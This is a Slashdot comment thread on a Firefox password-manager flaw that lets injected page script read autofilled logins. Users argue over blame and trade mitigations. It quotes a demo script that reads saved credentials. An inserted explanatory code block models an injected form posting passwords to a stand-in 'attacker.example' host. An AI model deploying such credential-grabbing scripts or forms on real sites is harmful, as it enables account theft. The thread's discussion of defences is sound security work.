      More FUD. The results of the encryption are base64 encoded, so if by "last I checked" you mean "I glanced at it and concluded incorrectly", then it might appear that way.

  20. Stealing passwords? Hardly... by goldspider · · Score: 4, Funny

    This isn't theft, it's liberation! Information (including passwords) wants to be free!

    --
    "Ask not what your country can do for you." --John F. Kennedy
  21. NoScript by Junior+J.+Junior+III · · Score: 1

    On the subject of Javascript-enabled security holes, I use Javascript because so many sites depend on it, but block all scripts using NoScript until I decide to trust the domain of origin of the script. What I'd really like is a NoScript that will let me look at the script's source code before I decide to trust it, and allow/deny scripts on a per-script rather than per-domain basis.

    That said, is there a good Add-on for Firefox that handles password-management more securely? Something that keeps them stored in an encrypted format would be a step in the right direction.

    --
    You see? You see? Your stupid minds! Stupid! Stupid!
  22. Firefox only? by IBBoard · · Score: 1, Informative
    Is Firefox really that insecure for this compared to the others? Yes, it auto-fills it but then any site that lets other people add Javascript to a page is vulnerable in an almost identical way. The main part of the script (on a timer to allow for auto-population) is:

    // Reads the fields of the form named "passtest" after the password
    // manager has had a chance to auto-populate them.
    function doit()
    {
      var name = document.passtest.name.value;
      var password = document.passtest.password.value;
      alert("Your username is: " + name + " and the password is: " + password);
    }
    // Run on a timer, so auto-population has already happened when the
    // values are read.
    setTimeout(doit, 1000);
    All you need is to know the form on the page, subscribe to the submit event and snag the password contents for yourself and you've busted any browser wide open (as long as it lets you enter usernames and passwords) without the need to exploit password saving. You could even potentially listen for Ctrl+Enter key combos in Opera, although catching the use of the wand might be more difficult.
    1. Re:Firefox only? by IBBoard · · Score: 1

      Just before someone starts "Firefox Fanboi!"ing at me, I do know there's a way where only Firefox's password remembering could be exploited. That situation is when you do what the demo does, but hide the forms through CSS, so the user won't see them but Firefox still auto-populates.

      Still, I think the fact that a website lets you include Javascript (which could then let you steal any password entered on the page, remembered or not) is a *much* bigger vulnerability. There are just so many ways you could exploit and abuse that!

    2. Re:Firefox only? by LouisLePegue · · Score: 1

      Is there a Bugzilla ticket on that ? why not ?

    3. Re:Firefox only? by Anonymous Coward · · Score: 0

      Well, really, it is the auto-fill thing. I use Netscape, which has a fairly similar password manager to Firefox's, but doesn't autofill the password unless you tell it to. Opera doesn't either; that's been mentioned. While it's probably still possible to catch the events in both of those browsers that do the password fill, the likelihood of those events firing is probably fairly small because people won't have any motivation to use Opera's wand or Netscape's Fill (or Fill-And-Submit) features without needing to. So, I think the fact that FF does autofill passwords in addition to uids makes it rather more vulnerable to this kind of attack than browsers like Netscape and Opera that don't.

      And by the way, just because it's really the site's vunerability doesn't mean that the browsers can't or shouldn't fix it.

    4. Re:Firefox only? by IBBoard · · Score: 1

      A bugzilla ticket on what? The main exploit or the general ability to access a form field (albeit a password one) via JavaScript from within a web page?

      I'd imagine the first one has been Bugzilla'd a bit, especially after these articles. The second one may have been, but AFAIK it's part of the standard and so my "the website shouldn't allow user-inserted JavaScript" comments from the other two posts apply.

  23. FIXED by giorgosts · · Score: 1

    https://addons.mozilla.org/en-US/firefox/addon/4429 (Secure Login). Lots and lots of settings for every taste.

  24. An extension to help you... by Aleksej · · Score: 2, Informative
    1. Re:An extension to help you... by Aleksej · · Score: 1

      That's what you get for writing one short and one long message in one comment, and then splitting them in two: someone else has posted the short one in the meantime.

    2. Re:An extension to help you... by e_AltF4 · · Score: 1

      Using it for some time and it seems to stop the vulnerability.

      Recommended if you are lazy (as i am) and allow FF to manage your passwords.

  25. Re:NoScript [MOD PARENT UP!] by Anonymous Coward · · Score: 0

    Alleluja!

    Actually this piece of news is a dupe of a dupe of a dupe...

    If you go online without noscript, you're braindead...

  26. Not so critical by Klaidas · · Score: 1

    Sure, it's a big issue, yet how many people actually use the "remember my password" feature? I just usually check the "remember me" box near the login and password entering fields, or enter my passwords manually.

    1. Re:Not so critical by IBBoard · · Score: 1

      I do, because some sites log me off after so long and I have so many combinations of similar passwords that I don't want to get locked out while trying them ;)

    2. Re:Not so critical by compro01 · · Score: 1

      i use it at work, but all the sites i use it for are internal sites that aren't accessible from outside our network, so i don't see any issue for me.

      --
      upon the advice of my lawyer, i have no sig at this time
  27. Is it Firefox specific? by 140Mandak262Jamuna · · Score: 3, Informative
    From what I understand, the user visits a site and the browser dishes out the remembered username password to that site. Whenever that site requests the username and password, the browser would do so. If the site allows any visitor to post javascript code and it incorporates such posted code as part of its own page, then the user too can use javascript to request the username/password and use javascript to phone home.

    Now why is any of it Firefox specific? Any browser/ browser-helper-object /password help toolbar would do the same. If you have only one user name for a site, firefox will pre-fill the field. And the javascript can read it without a get or post. I would guess this behaviour of prefilling when the username is unique is probably a Firefox thing.

    Generally sites that allow users to post javascript code would be dangerous and should not be visited. But I would not know a priori these sites.

    --
    sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
    1. Re:Is it Firefox specific? by makomk · · Score: 1

      Bingo! Notice that, in the demo, the password form and the malicious page are on the same domain. JavaScript's security model is not designed to protect against situations like this - even if Firefox only filled in the password on the actual password form and not the malicious page, the malicious page could just load up the password form in a frame and use cross-frame scripting to retrieve the password. This is a non-event.

  28. I love FireFox BUT... by thanksforthecrabs · · Score: 1

    I use FireFox for 95% of my browsing (mainly because of no ActiveX and AdBlock Plus), but I've always wondered if being open source means that code monkeys can write script to steal passwords just by simply knowing how the browser works...not by taking advantage of a published security hole...

    1. Re:I love FireFox BUT... by Vexorian · · Score: 2, Insightful

      It also means that bugs get fixed faster and that if mozilla stops supporting a platform someone else can, and that we can have things like swiftfox available, so I think it is a good trade.

      But security through obscurity doesn't really work too well anyways...

      --

      Copyright infringement is "piracy" in the same way DRM is "consumer rape"
    2. Re:I love FireFox BUT... by IBBoard · · Score: 2, Insightful

      Possibly, but how many bugs have been exploited in Firefox because of being able to view the source code and how many would have been picked up by a closed-source 'fuzzing' anyway?

      This one was a "how the browser works" based on visible behaviour, so it would have been found in a closed-source app as well.

    3. Re:I love FireFox BUT... by DnasTheGreat · · Score: 1

      To steal passwords when physically sitting at the computer, yes. But this is true with proprietary browsers as well, they just find where it's stored, i.e. security through obscurity, which doesn't work. There'll always be someone who figures out how to crack it, if nothing else, by disassembling the binary. And once it's cracked once and announced, it's gone.

      (If you use the Master Password feature so that your passwords are encrypted, then open source or not doesn't matter. (Actually it helps, because then people can make sure the encryption is secure.) The catch is that you have to type in your Master Password occasionally or even Firefox can't get to the passwords.)

      But this article is about stealing passwords remotely. That's another story. Even without a Master Password, the fact that it's open source doesn't affect how easily someone can steal it (ignoring the code quality and ease of bug-fixing in open source, since you're solely talking about the code being open). The website is only allowed to talk to the browser through the usual means. If it finds some other way to talk to the browser or the implementation of the usual means allows more access than desired, then we have a problem, like here.

      As an analogy, say I have a bolted door, and you're trying to open it. Everyone knows how the door works; there's a bolt that gets in the way and stuff. If you're inside the house, then you can open it easily. However, if I only allow you to talk to the door from the outside, you can't open it because you can't unbolt the thing. (Ignoring chainsaws, explosives, and other nifty destructive things.)

  29. Site's fault. by Aleksej · · Score: 1

    Please, isn't it the site's vulnerability and not Firefox's, eh?!!
    If a site owner tells me it's my browser's fault that their users can change their site's behaviour, and s/he is not going to do anything about it, I'll leave the damn site.

    1. Re:Site's fault. by Random+BedHead+Ed · · Score: 1

      I'm not entirely sure it is the site's responsibility. Or rather, who you choose to blame depends a great deal on how much you value your passwords. The warning inherent in this vulnerability isn't really intended for webmasters, but rather for browser users. And even if as a browser user you think you're safe, keep in mind that sites get hacked. Even if you trust a site, anyone who hacks it can start harvesting login credentials. Scary.

    2. Re:Site's fault. by Aleksej · · Score: 1

      Agreed. Though, if the site gets hacked with that intent, nothing really matters as long as the user decides to enter the password...

    3. Re:Site's fault. by Aleksej · · Score: 1

      I mean, nothing but NoScript matters, if the password is going to be transferred using JS. And then the problem is not unlike the one with remote images blocking: you'd like to allow it by the source, not only by the target. Well, at least I would.

  30. You can always do this kind of stuff with cookies. by scienceguy55 · · Score: 1

    In most cases a vulnerability like this will not significantly increase your risk of exploitation as most web sites store passwords in cookies anyway, which are supposed to be readable by javascript from the originating site. If I can run a script on a myspace profile that you visit I can get your password from the cookie that myspace stores on your machine.

  31. Safari by ens0niq · · Score: 3, Interesting
    1. Re:Safari by pherthyl · · Score: 3, Interesting

      Interestingly enough, Konqueror/KHTML (on which Safari is based) is not vulnerable (just tried the demo). It does password saving as well, but apparently they have found a way to avoid the problem.

  32. Re:Stealing passwords? Hardly... by AndersOSU · · Score: 1

    Not only that, but when they use the free passwords, it's not identity theft, it's identity infringement.

  33. Re:You can always do this kind of stuff with cooki by adnonsense · · Score: 1

    Err, I don't know about myspace, but any half-decently programmed website (hopefully the majority) won't be storing anything in your cookies other than trivial configuration preferences and a session key. Certainly not your password. While it's possible to hijack the session by reading the session key (and there are ways of preventing that on the server side too), that won't get you the user's password. Unless the site in question is incredibly badly programmed, in which case you're probably lost anyway.

  34. Trust by BlueParrot · · Score: 1

    a) If it is your machine you could just as well use a PGP encrypted text file. If the website in question is still vulnerable, then it is a problem with the website, and changing browser won't help you.

    b) If it is not your machine, or if you think your machine is compromised, then you really shouldn't be typing your passwords in it to begin with.

    Seriously, find a strong passphrase and store the damn password list as a PGP encrypted file on a USB pen drive. Only decrypt it on machines you trust. If you still lose your password then you either typed it into a compromised machine ( meaning you're fucked anyway ), you were victim to a man in the middle attack ( meaning you're fucked anyway ) or there was a vulnerability on the server side ( meaning you're fucked anyway ).

    Personally I don't trust a whole lot of websites to secure their own systems so I don't use my root or e-mail password for my facebook account...

  35. Password = Password by BrentRJones · · Score: 1

    keeps it much easier for all my sites, except my bank for which I use Pa$$word. I trust you guys here not to spread this around.

    --
    Help end the use of Sigs. Tomorrow
    1. Re:Password = Password by WK2 · · Score: 1

      Thanks a lot, jerk. Your bank account was already empty.

      --
      Write your own Choose Your Own Adventure. http://www.freegameengines.org/gamebook-engine/
  36. the great law of computer security by wikinerd · · Score: 1

    The Great Law of Computer Security: Networked computers are insecure by nature. Everything that is stored within a networked computer can and will be compromised. Corollary: Always use a non-networked computer to store critical data, or better yet, no computer at all; a piece of paper inside your wallet is probably safer in most situations. Shortened version: Distrust all computers.

  37. Not the only issue by the_womble · · Score: 1

    I have found all versions of FF from 1.0 to 2.0.0.4 tend to sometimes store a password unasked, and then automatically fill in the password (but not the username) on my next visit to the site.

    I have never heard of anyone else having this problem, and I cannot reliably reproduce it, but it does happen occasionally.

  38. Not required. by Anonymous Coward · · Score: 0

    Not required. FireFox, like most Open Source software has no security flaws. NEXT!

  39. never need to remember unique passwords per site by speculatrix · · Score: 1
    I am ashamed to admit but I used to use the same password on many sites, only using unique passwords for those I regarded as important. It was only when at one job the employer terminated the employment of many staff (financial problems) and we were forced to leave the building without returning to our desks that I realised that saving passwords on a work computer was not a good thing (my then former colleagues would have had access to my password saves in firefox and thus access to my default pass).

    Since then I've been using supergenpass which allows you to have a unique password for each web site generated using a master password and a hash of the domain.

    I no longer save passwords in firefox, and the passwords used on websites are nicely random too. Moreover, I only need to remember my master password and so can use any computer.

  40. Stupid Design by Slashdot+Parent · · Score: 1

    Is there some reason that Firefox thought it was a good idea to automatically populate passwords for the user?

    It just seems to me like better design to require some sort of user interaction before coughing up a password.

    --
    They don't grade fathers, but if your daughter's a stripper, you fucked up. --Chris Rock
  41. Master Password by Bellum+Aeternus · · Score: 1

    Since disabling JavaScript really isn't an option these days, I guess my question is: does using a Master Password (like I do) really protect you? Will somebody from Mozilla comment, please. Seriously, since the advent of an integrated Master Password I've been letting my web browser remember passwords for me, but this really put a dent in my confidence.

    --
    - I voted for Nintendo and against Bush
    1. Re:Master Password by Anonymous Coward · · Score: 0

      disabling JavaScript IS really an option these days. use NoScript, whitelist the few sites you are using daily and really need JavaScript, and to hell with the others.

      heck, if you already use Adblock and tools like Permit Cookies, why not ?

  42. so.. uh... by Anonymous Coward · · Score: 0

    why broadcast to the entire world that there is a problem, so that those with the know how, can find out about it and start hacking....

    now. Firefox has to work twice as hard to cover it up, because more people are going to try and use it before they fix it....

  43. Hardly. by Anonymous Coward · · Score: 0

    Information (including passwords) wants to be free!

    Passwords may be data, but they are not information.

  44. config:about by Ummon · · Score: 1

    set signon.prefillForms to false

    1. Re:config:about by colfer · · Score: 1

      Parent is exactly right. This is old news, but Firefox still ships with the insecure default setting.
      http://kb.mozillazine.org/Signon.prefillForms
      To change it to "false", type "about:config" in the address bar, hit enter, and put "prefill" or whatever in the filter to search to it:
      signon.prefillForms

  45. Dupe? What else! by haraldm · · Score: 1

    Ohmygod. Dupes belong to the culture of Slashdot, they are the cherry on the cake for all the people who don't get a message the first time, or who make a living pointing out dupes on /.

    For what it's worth, messages with a subject ~ "*[Dd]upe*\!" are the most common dupes, and should be avoided at all cost.

    We should stop pointing out dupes and start slashing non-dupes. That would reduce the traffic by at least 24.3% and would allow /. to postpone the next harddisk purchase by a month or two, or one could purchase 750GB instead of 1TB disks.

    --
    open (SIG, "</dev/zero"); $sig = <SIG>; close SIG;
  46. How to solve this by Random832 · · Score: 1

    How to solve: Do the opposite of what's done with input type=file
    With input type=file, the script cannot write the value, and changing it to this from another type clears the value. With input type=password, have it so that changing it _from_ password _to_ another type clears the value, and so that the script cannot _read_ the value.

    --
    We've secretly replaced Slashdot with new Folgers Crystals - let's see if it notices.
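    The two fixes discussed in comments 44 and 46 (refusing to prefill saved passwords, and keeping script from reading a password field) can be modelled together. The following is an added example, not part of this thread and not Firefox's password-manager code: a toy autofill decision plus a toy password control. The saved-entry shape, the option names, the attacker hostname and the two sample forms are assumptions constructed for the example; the `prefillForms` option stands in for the about:config preference signon.prefillForms named above.

```javascript
// Added example (not Firefox code): why a login form pasted into a
// user-authored page on the same site receives the saved credentials, and
// which checks stop it. Entry shape, option names and URLs are assumptions.

function originOf(urlString) {
  const u = new URL(urlString);            // built-in WHATWG URL (Node >= 10)
  return `${u.protocol}//${u.host}`;
}

// Constructed sample: the entry the manager stored when the user logged in.
const SAVED = {
  pageOrigin: "http://www.myspace.com",    // page the login happened on
  actionOrigin: "http://www.myspace.com",  // where that login form posted
  username: "victim",
  password: "hunter2",
};

// Constructed forms: the site's own login form, and one a malicious user
// pasted into their profile page, posting to a server they control.
const REAL_LOGIN = { pageURL: "http://www.myspace.com/index.cfm", action: "/login.cfm" };
const INJECTED   = { pageURL: "http://www.myspace.com/joebob",   action: "http://attacker.example/steal" };

// Behaviour the thread describes: fill as soon as the page origin matches,
// without looking at where the form will submit.
function fillVulnerable(form, saved) {
  if (originOf(form.pageURL) !== saved.pageOrigin) return null;
  return { username: saved.username, password: saved.password };
}

// Hardened decision:
//  1. with prefillForms=false nothing is filled until the user acts on the
//     field (the manual double-click described in the thread);
//  2. the resolved form action must have the origin the credential was
//     saved for, so a form posting to attacker.example gets nothing.
function fillHardened(form, saved, opts = {}) {
  const { prefillForms = true, userGesture = false } = opts;
  if (originOf(form.pageURL) !== saved.pageOrigin) return null;
  if (!prefillForms && !userGesture) return null;
  const target = new URL(form.action || "", form.pageURL).href;
  if (originOf(target) !== saved.actionOrigin) return null;
  return { username: saved.username, password: saved.password };
}

// Random832's proposal, modelled: page script cannot read a password
// control's value, and retyping the control to another type discards it.
class PasswordControl {
  constructor(value) { this._type = "password"; this._value = value; }
  get type() { return this._type; }
  set type(t) {
    if (this._type === "password" && t !== "password") this._value = "";
    this._type = t;
  }
  get value() {                            // what page script sees
    return this._type === "password" ? "" : this._value;
  }
  submitValue() { return this._value; }    // what the browser puts in the POST
}

// The two ways an attacker's markup can get a filled value out.
function leakViaScript(field) {
  const direct = field.value;
  field.type = "text";                     // classic trick: retype, then read
  return direct || field.value;
}
function leakViaSubmit(field) {
  return field.submitValue();
}

// Stand-alone run summarising the outcomes.
function demo() {
  const filled = fillVulnerable(INJECTED, SAVED);
  return {
    vulnerableFillsInjectedForm: filled !== null,
    scriptReadWithProposal: leakViaScript(new PasswordControl(filled.password)),
    formPostWithProposal: leakViaSubmit(new PasswordControl(filled.password)),
    hardenedFillsInjectedForm: fillHardened(INJECTED, SAVED) !== null,
    hardenedFillsRealForm: fillHardened(REAL_LOGIN, SAVED) !== null,
  };
}

console.log(demo());
```

Running it shows the point of both comments: the script-read path is closed by the proposed field semantics, but `formPostWithProposal` still yields the password, because an injected form can simply submit to the attacker's server without any script. That path is only closed by not prefilling (signon.prefillForms set to false, so the user must act on the field) or by refusing to fill a form whose action origin differs from the one the credential was saved for.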
  47. As long... by amccaf1 · · Score: 1

    As long as no one figures out an exploit wherein the hacker can turn on my webcam and point it at the yellow sticky notes stuck to the side of my monitor, they'll never get my passwords.

    --
    "Flag on the moon. How did it get there?"
  48. Learn more about this exploit by giminy · · Score: 1

    This exploit involves users visiting a malicious website. To learn more about this exploit, click here.

    --
    The Right Reverend K. Reid Wightman,
  49. Like I'm dumb enough by Master+of+Transhuman · · Score: 1

    to allow any APPLICATION to remember my passwords...

    That's what my brain is for. And for those of you without brains - and you know who you are - there are encrypted password managers for that.

    --
    Richard Steven Hack - This sig is TOO GODDAMN SHORT TO DO ANYTHING USEFUL WITH! MORONS!
  50. Re:Stealing passwords? Hardly... by Jherek+Carnelian · · Score: 0

    This isn't theft, it's liberation! Information (including passwords) wants to be free! Presumably you are trying to make a didactic point discrediting the slashdot hive mind's belief that 'piracy' is the natural order of things.

    But all you've really done is to reinforce that belief, not discredit it. The whole foundation of the "information wants to be free" meme is that in making something public, you relinquish all control over it. In this case, Firefox's password manager has a flaw that causes it to make passwords public, thus causing the 'owner' to relinquish all control over them.

    So, just as the standard advice to publishers afraid of piracy is, "don't publish it if you don't want it pirated" the same thing goes in this case, "don't use the buggy password manager if you don't want your passwords published."
  51. Re:Stealing passwords? Hardly... by jgoemat · · Score: 1

    This isn't theft, it's liberation! Information (including passwords) wants to be free!
    I assume you are making a dig at the anti-copyright crowd. The distinction you fail to see is that copyrighted works are published, letting recipients know exactly what is in them. It is merely the monopoly on copying and creation of derivative works that is protected by law in order to give the public an incentive to create new works. Passwords are opposite in that they are kept secret for a good reason. Also they probably cannot be given a copyright monopoly since there is not a modicum of expression in most passwords.
  52. OpenID by Poromenos1 · · Score: 1

    God, I wish everyone would just switch over to OpenID and be done with it. One password for everything? Sign me up! (Well, I already have). Now I'm just waiting/hoping it'll gain critical mass and start being implemented into every site.

    --
    Send email from the afterlife! Write your e-will at Dead Man's Switch.
  53. Oh really? by jgoemat · · Score: 3, Informative

    How are you safe?
    1. Open browser
    2. Click on MySpace bookmark
    3. Enter master password to login to myspace
    4. Visit joebob's page, which has javascript to steal your password
    5. pwn3d
    If you're on the site with the vulnerability, you probably already entered your master password to login, and you only have to do that once per session to use all of your passwords.
  54. Sorry to come in late but there's a catch to this by Allnighterking · · Score: 1

    IF you password protect your master password list then when you go to the "evil page" it will pop up a window asking for your master password. Furthermore, to protect yourself even more you can install this plugin, Master Password Timeout, and set your password to time out after a very short period of time. This way, every page you go to during your session that has a login will require you to enter your master password again anew.

    Is this a fix? No. Does this work on all OSes? Yes.

    --
    I'm sorry, I'm too tired to be witty at the moment so this message will have to do.

  55. Online Security made simple by donak · · Score: 1

    Back in the day when I got my first sparkling new Windows PC, it had this great feature called an address book, built in and waiting eagerly to save all the email addresses of the friends I sent email to. At the same time I got that Windows PC onto the internet by the new modern 32kb/sec dialup connection I had, I was hearing/reading about how viruses could be used to "read" the contents of my address book for infecting/spamming purposes.

    So I never used it.

    I apply the same principle to web browsers of all flavours which offer to "save" my passwords. Not hard, is it?
    If you really, seriously can't remember UIDs/passwords for websites, keep a small notebook handy (and safe).

    --
    Don't blame me, it's usually 2 in the morning when I post ...
    1. Re:Online Security made simple by timrichardson · · Score: 1

      This is a very late post, but changing this setting will help:
      http://kb.mozillazine.org/Signon.prefillForms

      In Firefox, enter
      about:config
      type prefill to search on this term, and double click the entry above to set it to false.

      You will then have to double click on a field before password manager provides any input to the page.